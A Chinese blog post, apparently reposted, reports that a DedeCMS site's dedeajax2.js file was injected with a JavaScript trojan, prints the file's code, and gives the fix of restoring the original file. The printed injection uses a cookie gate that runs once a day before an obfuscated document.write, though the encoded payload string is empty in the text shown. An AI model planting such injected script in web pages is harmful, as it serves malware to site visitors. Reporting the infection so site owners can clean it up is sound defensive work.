织梦dedecms:dedeajax2.js被植入js木马

织梦dedecms:dedeajax2.js被植入js木马,第1张

织梦dedecms:dedeajax2.js被植入js木马 这阵子我的一个织梦dedecms网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。

结果发现,dedecms织梦ajax2.js被植入了木马。源码如下:   //初始化xmldom function InitXDom(){ if(DedeXDOM!=null) return; var obj = null; if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox var parser = new DOMParser(); obj = parser.parseFromString(xmlText, "text/xml"); } else { // IE try { obj = new ActiveXObject("MSXML2.DOMdocument");} catch (e) { } if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { } } DedeXDOM = obj; }; //以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了 if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}   用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。   不过建议大家,多注意dedecms的官方补丁,unix服务器的织梦站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/3008335.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-09-27
下一篇 2022-09-27

发表评论

登录后才能评论

评论列表(0条)

保存